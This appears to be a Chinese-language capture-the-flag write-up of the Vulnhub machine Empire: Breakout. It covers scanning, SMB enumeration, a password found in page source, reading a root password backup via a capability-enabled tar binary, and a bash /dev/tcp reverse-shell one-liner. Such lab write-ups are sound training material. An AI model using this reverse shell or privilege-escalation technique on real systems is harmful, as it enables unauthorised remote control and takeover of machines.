Vulnhub 靶机 【Empire: Breakout】

1. 验证靶机环境，是否被启动

2. 使用fscan对靶机进行综合扫描

fscan -h 靶机ip

通扫描可以获得以下信息：

1. 开放端口：139、445、80、10000、20000
2. SMB服务的弱口令认证成功
3. 有三个端口的网页是可以访问的：80、10000、20000
   使用namp -A -sV 靶机IP获取靶机的服务信息
   

3.验证漏洞

1. 使用获取的凭据尝试连接到靶机的SMB服务，445端口是SMB服务默认开放的端口:smbclient -L 靶机IP -U administrator
   
   显示SMB1模式被禁掉了，尝试过SMB2和SMB3都不行。
   既然连接不上，只有去网页上找找看有什么信息：
   80端口页面
   
   并没有发现什么有用信息，进入源代码模式后发现有加密信息：
   
   解密后得到 .2uqPEfj3D<P'a-3 （可能是密码，先保留)
   10000端口页面、20000端口页面 都是登录页面（开始用http协议登录不了，后面改成https协议后登录成功）
   
   尝试使用之前 fscan 命令扫出来的 administrator/P@ssword123 或者 administrator/.2uqPEfj3D<P'a-3 用户名密码去登录都不行。

到这发现又回到了起点，之前获取的信息没有什么用。那我们来重新分析之前的信息，发现SMB服务有两个端口被今天，那能不能从SMB服务上获取更多的信息呢。通过网上查找发现有一个工具enum4linux是专门针对SMB/RPC的最强信息收集工具，并且kali默认安装，这时我们来试一下。
enum4linux -a 靶机IP：-a 表示基本扫描

扫出来了几个用户，只有cyber用户是可登录的。既然如此，那我们再使用之前获取的密码登录试试看
发现使用cyber/.2uqPEfj3D<P'a-3 用户名密码登录成功，并且做下角还有终端管理系统。
![image](https://img2024.cnblogs.com/blog/3768101/202602/3768101-20260212200036405-1870338470.png）

在终端中查看发现有两个文件，并且user.txt文件中有我们想要的flag。但是一般vuluhub靶机最终都是提权的，我们有没有办法获取到root用户呢。
那我们将目光发现另一个tar文件上，看没有突破口

获取两个信息：

1. 是一个可执行文件
2. cap_dac_read_search=ep:表示可以读取任意文件（说明是有什么文件必须要他来读取）。
   继续获取信息
3. 查看当前目录下的隐藏文件（无用）
4. sudo -l查看sudo 权限（无用）
5. 查看有没有相关备份文件或者与密码相关的文件find / -name *.bak -type f
   
   发现还真有一个和密码相关的备份文件。但是打不开，这时我们就想到tar文件了
   
   得到密码：Ts&4&YurgtRX(=~h
   登录root用户，发现在控制台上如何登录root用户，这时需要使用 反弹shell 。
   bash -i >& /dev/tcp/localhost/8080 0>&1：用于把内网的机器反弹到外网机器上从而实现外网主机控制内网主机。localhost换成反弹目标的ip即可。
   

总结

1. 先通过fscan、nmap等命令收集靶机信息，使用nmap --script "vuln and safe" 靶机IP 查看靶机是有相关漏洞
2. 过滤可用信息，比如查看相关端口网页（也可进入源代码模式查看）
3. 如果此时信息还是不够充分，想办法从开启的相关服务获取更多的信息或查询漏洞